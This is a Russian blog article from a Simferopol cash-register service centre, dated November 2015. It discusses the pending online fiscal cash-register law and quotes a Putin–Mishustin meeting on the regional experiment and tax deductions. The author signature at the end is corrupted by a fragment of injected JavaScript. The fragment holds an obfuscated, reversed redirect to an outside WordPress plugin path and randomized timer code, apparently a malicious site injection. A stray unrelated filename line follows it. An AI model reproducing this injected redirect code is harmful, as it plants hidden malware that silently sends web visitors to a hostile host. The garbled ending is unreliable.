О будущем кассовой техники

Что будет с кассовой техникой после 1 января 2016 года? Где достать кассовый аппарат, способный передавать данные в ФНС? На основании последней информации попробуем вместе трезво оценить ситуацию, чтобы перестать задаваться подобными странными вопросами. Ведь нам с Вами, уважаемые клиенты, уже однажды довелось пережить подключение наших аппаратов к общегосударственной системе сбора фискальных данных в режиме онлайн.

Еще с 2014 года о принятии закона, в корне меняющем рынок ККТ, говорили как о неизбежности. Принятие закона ожидалось летом 2015, вступление в силу — либо немедленно после принятия, либо с 1 января 2016 года. Было известно о проходящем в четырех субъектах федерации эксперименте с передачей данных, о нескольких конкурирующих проектах изменений, о противодействии тех, кому и при существующем порядке вещей неплохо торгуется ЭКЛЗ…

В июне Минфин опубликовал проект поправок в закон, но на рассмотрение Госдумы вынесен он не был. До центров технического обслуживания от поставщиков техники донеслись слухи, что вопрос отложили на неопределенный срок. Объясняли это тем, что дешевая нефть вызвала дефицит финансовых ресурсов у государства, а именно за счет бюджета мобильные операторы, якобы, рассчитывали на обновление своей технической базы для обеспечения мобильным интернетом всей территории страны (интернет нужен для передачи данных с кассовых аппаратов на сервер налоговой).

Не будем сейчас углубляться в подробности предлагаемых изменений — прочитать их подробный разбор можно на множестве ресурсов. Суть любых подобных реформ заключается в наладке системы, при которой налоговые органы получают оперативную и достоверную информацию о выручке всех налогоплательщиков. Желательно, максимально полную и от наибольшего числа поставщиков товаров и услуг. В идеале, государство хочет знать о том, что было куплено, в каком количестве, по какой цене, кем, и на следующую секунду после закрытия чека. В идеале, опять же, не только при расчете банковской картой в супермаркете, а и при покупке пакета семечек в ларьке. Раньше всего подобного удастся добиться в контроле за оборотом алкоголя, но это отдельный разговор.

Существующий сегодня законопроект является продуктом преломления желаний государства через призмы здравого смысла, технических возможностей и интересов участвующих сторон. Что приятно, авторы проекта постарались проявить заботу об интересах как конечных потребителей, так и бизнеса. Что неприятно, так это то, что возможность получить копию чека через интернет, например, не нужна подавляющему большинству покупателей. Тому же большинству, у которого ни разу не возникло желания проверить законность деятельности продавца, введя реквизиты фискального чека на сайте kpkcheck.ru.

Бизнесу тоже пытаются подсластить пилюлю усиления контроля и новых расходов. Например, делается вывод, что исчезнут расходы на техническую поддержку кассовой техники

Наблюдая за ежедневно поступающими в ремонт засбоившими современными российскими кассовыми аппаратами, технология производства и эксплуатации которых должна быть давно отлажена, вспоминая, как новые исправные и подключенные к качетвенному интернету украинские аппараты с модемами по неизвестным никому причинам иногда просто отказывались передавать в налоговую файл с результатами Z-отчетов… Представляя нарисованную авторами законопроекта картину будущего, включающего фискальные накопители, загадочных операторов фискальных данных, отсылку чеков покупателям по интернету, электронную подпись, не верится, что возможно усложнить систему, добавить ей новых функций, и при этом надеяться, что все будет бесперебойно работать само, после нажатия виртуальной кнопки в личном кабинете налогоплательщика на сайте ФНС. Даже с учетом научно-технического прогресса пары последних десятилетий.

Тот факт, что до предполагаемого срока вступления закона в силу остается чуть более месяца, удивительным образом не смущает тех, кто продолжает верить, что уже с 1 января 2016 года что-то изменится. Читайте о единственных существенных изменениях с 1.01.16. — за не снятый с учета украинский аппарат в Крыму можно будет получить штраф.

Во второй половине года со стороны производителей кассовой техники поступало мало конкретной информации о том, к чему они готовят свою продукцию. Из относительно недавних многочасовых рассуждений руководителя одного из основных производителей кассовой техники можно сделать следующие выводы: технического задания на модернизацию существующей техники и разработку новой не существует, так как никто, похоже, еще точно не знает, какие конкретно функции эта техника должна будет выполнять, хотя бы на первом этапе модернизации.

Непосредственным поводом для написания статьи послужило пятничное совещание президента Путина с руководителем Федеральной налоговой службы Мишустиным, анализ которого дает новую пищу для размышлений о стадии готовности проекта изменений и уровне приоритета вопроса в глазах верховной власти. Ссылка на видеорепортаж.

PR20151120152025

В.Путин: […]мы недавно провели эксперимент в четырёх субъектах Российской Федерации, где внедряли новые системы кассовых аппаратов, которые должны были в системе реального времени подавать информацию в соответствующие налоговые службы. Хотелось бы вернуться к этой теме. Как этот эксперимент проходит и каковы его результаты?

М.Мишустин: Да, действительно, Владимир Владимирович, эксперимент был проведён. Мы работали с четырьмя регионами: Москва, Московская область, Татарстан и Калужская область. Было установлено свыше трёх тысяч соответствующих новых инновационных кассовых аппаратов, которые, как Вы сказали, онлайн передавали информацию в налоговую службу об оборотах компании, чеках, которые компания выдаёт потребителям, то есть нашим гражданам.

В.Путин: И такая система сейчас отлажена по этим четырём регионам?

М.Мишустин: Да, она отлажена и продолжает свою работу. Правительство – этим Игорь Иванович Шувалов занимается – приняло решение о том, чтобы продолжать работать в этом эксперименте, чтобы те издержки, на которые бизнес пошёл, когда стал внедрять инновационные кассовые аппараты, не потерялись, а чтобы мы продолжали.

То есть, разработана система, к ней подключены первые пользователи, выявлены и устранены недочеты. Следующим логическим шагом является распространить систему на все прочие регионы страны, с учетом полученного опыта. Однако со слов главы ФНС можно понять другое: эксперимент проведен, данные получены, а что делать дальше — не понятно. То ли вернуть экспериментаторов к общим для страны условиям работы, то ли позволить им продолжить работать в экспериментальном режиме. Варианта со скорым «расширением эксперимента» на всю страну, или хотя бы еще на несколько регионов, за этими словами не угадывается.

Нужно обратить внимание на одно обстоятельство. Один из результатов эксперимента был следующим: передача данных в налоговую через интернет средствами торгового ПО была признана недостаточно защищенной. Для устранения этой опасности, вроде, было решено изменить схему: теперь передавать данные в зашифрованном виде должен будет специальный блок, подключенный непосредственно к кассовому аппарату. Вот его еще потребуется разработать (каждому производителю для каждой разновидности ККМ), протестировать, наладить работу по сбору и обработке данных.

В.Путин: […] И второе. Нужно продумать и проговорить с депутатами Государственной Думы вопрос о законодательном закреплении этой работы.

Если для начала продумывания законов депутатам не достаточно общественных обсуждений проекта изменений, подготовленного Минфином, а требуется команда, отданная лично президентом, то можно считать 20 ноября датой начала реальных действий по принятию поправок в законодательство. Ведь дальше следует разговор о вещах, никаким образом не предусматриваемых существующим законопроектом.

В.Путин: […] Это даст возможность, если говорить простым языком, человеку, после того как он пообедал в ресторане и заплатил деньги за бифштекс из телятины хорошего отечественного качества, проверить, так ли отчиталось предприятие, тот ресторан или кафе, которое продало ему этот товар, как они отчитались в налоговой инспекции – не отчитались ли они дешёвой буйволятиной. То же самое касается всех других товаров. И вообще понять, существует ли то торговое предприятие, которое продало товар или оказало услугу, или это просто какая‑то фирма-однодневка, или вообще не зарегистрированная торговая точка. Это касается и крупных предприятий, это касается и мелких – скажем, тех, кто цветы продаёт.

Любопытно, депутатам предлагается что-либо в ближайшие сроки уже «закрепить законодательно» или только начать думать над реализацией предложенной президентом идеи по предоставлению покупателю возможностей для волонтерской налоговой проверки продавца? Или изменения будут вноситься поэтапно?

М.Мишустин: […] Это мы также реализуем сейчас в опытной эксплуатации. Конечно, всё продумаем, и, я думаю, в ближайшее время уже закончим оформление законодательных инициатив. Как Вы сказали, работать будем с депутатами Госдумы для того, чтобы это законодательство было принято.

Во что и когда все это выльется на наши головы, будем ждать.

Ну и самое приятное для бизнеса из сказанного в пятницу.

В.Путин: В этой связи нужно сделать несколько шагов дальше, а именно, чтобы бизнес не терял никакие средства, связанные с приобретением новых кассовых аппаратов (а это не что иное, как, скорее всего, простые гаджеты или какие‑то чипы в действующие кассовые аппараты), – так вот, чтобы бизнес не нёс дополнительные нагрузки, нужно принять решение о так называемом налоговом вычете для тех предприятий, которые будут переходить на эту форму работы. Первое.

То есть, президент предлагает разработать механизм, при котором бизнес сможет компенсировать свои расходы на модернизацию с помощью налогового вычета. Остается надеяться, что именно такое решение и будет принято, и реализовано будет так, что воспользоваться им смогут все законопослушные налогоплательщики.

Пока что выводы из всей имеющейся информации можно сделать следующие:

1. Закон о внесении изменений в законодательство о ККТ еще не принят (не обсужден, не скорректирован, не принят Госдумой, не подписан президентом). Вероятность того, что это будет сделано в авральном режиме в ближайшее время и изменения наступят уже 1 января 2016 года, будем надеяться, близка к нулю.

2. Рано или поздно, но изменения, в большем или меньшем объеме, разом или поэтапно, будут приняты. Если государство планирует развиваться, то фискальный контроль за бизнесом, неизбежно, будет совершенствоваться. Возможно, расходы на эти мероприятия в какой-то мере (может и полной) государство возьмет на себя.

3. Сегодня не существует кассовой техники, удовлетворяющей перспективным требованиям законодательства. Если Вам требуется снимать с учета аппарат украинского образца, ставьте вместо него любой подходящий Вам российский. Вероятность того, что программно-технический комплекс впишется в картину «завтрашнего дня» выше, чем с автономной кнопочной кассой.

4. О всех существенных изменениях Вас, в нужный момент проинформирует Ваш центр технического обслуживания ООО «Таврия-Лизинг», и, как всегда, поможет наиболее комфортно приспособить бизнес к требованиям государства.

Обновлено 27.11.15. Сегодня в новостях на «Первом» обмолвились, что «постепенно, начиная с апреля будущего года, в розничную торговлю начнут внедрять аппараты нового типа». Имея в виду уже применяемые в эксперименте в 4 регионах. Или уже другие, самостоятельно передающие данные через интернет? Можно только гадать. Будем наблюдать, как за 4 месяца примут закон, разработают технику, создадут инфраструктуру, перепишут и внедрят регламенты работы ФНС и т.д. Или будем надеяться, что государство не изменит своей национальной традиции, и будет «запрягать» достаточно долго, чтобы «поездка» вышла для предпринимателей комфортной.

г.Симферополь. 23.11.2015г. Текст: Сальцын Кирилл aficionatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do10@mail.ru
1277322579_am-robert_mccall_the_prologue_and_the_promisedetail-s1